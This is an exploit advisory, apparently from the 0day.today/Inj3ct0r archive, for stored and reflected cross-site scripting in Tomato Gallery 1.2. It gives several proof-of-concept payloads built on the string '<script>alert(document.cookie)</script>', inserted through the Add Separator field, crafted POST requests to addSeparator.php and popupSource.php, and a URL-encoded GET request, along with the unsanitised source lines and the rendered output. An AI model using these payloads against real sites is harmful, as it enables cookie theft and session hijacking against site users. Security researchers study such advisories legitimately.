Tomato Gallery 1.2 (logged only) Persistant Xss Vunerability

# author: lemlajt
# software link: http://tomatogallery.yzx.se/
# version: 1.2
# tested on: linux
#cve :

poc0.1 :


1. http://localhost/www/cmsadmins/tomato_gallery_1_2/edit/index.php

2. click @ "Add Separator" and type: bla'';!--<script>alert(

document.cookie)</script>=&{()} in the box

3. persistant.


try:

POST http://localhost/www/cmsadmins/tomato_gallery_1_2/ajaxinfo/addSeparator.php

?separatorName=bla'';!--<script>alert(document.cookie)</script>=&{()} HTTP/1.1

more:

cat -n $tomato_dir/ajaxinfo/addSeparator.php

--- <ut ------ <ut ------ <ut ------ <ut ---

11     $albumName =     $_GET["separatorName"];

--- <ut ------ <ut ------ <ut ------ <ut ---

... and more, enjoy! o/

* csrf?

poc0.2 :

POST http://localhost/www/cmsadmins/tomato_gallery_1_2/ajaxinfo/popupSource.php?popup=create-album&album=undefined HTTP/1.1

;]

in second line of ajaxinfo/popupSource.php we see:

$popup = $_GET['popup'];


replace 'create-album' to: ''script


in source of generated page find your alert:

<li id="item_0" style="margin:0; padding:0; list-style:none;" lang="test;!--<script>alert(document.cookie)</script>=">
<div class="group" onMouseOver="hoverAlbum('in','1')" onMouseOut="hoverAlbum('out','1')" id="album1">
<div class="stripe"></div>
<div class="albumText" style="position:absolute;" id="albumText1"
onclick="this.innerHTML = this.lang" lang="test';!--<script>alert(document.cookie)</script>=">test';!--<script>alert(document.cookie)</script>=
</div>

file inputs?

 

poc0.3 : some error when typing:

http://localhost/www/cmsadmins/tomato_gallery_1_2/edit/index.php?album=%27%27;!--%3Cscript%3Ealert%28document.cookie%29%3C/script%3E=&{%28%29}#

 

poc0.4 : xss via GET

 
$search = '';!--<script>alert(document.cookie)</script>=&{()}


regards Inj3ct0r Team!

#  0day.today [2018-04-02]  #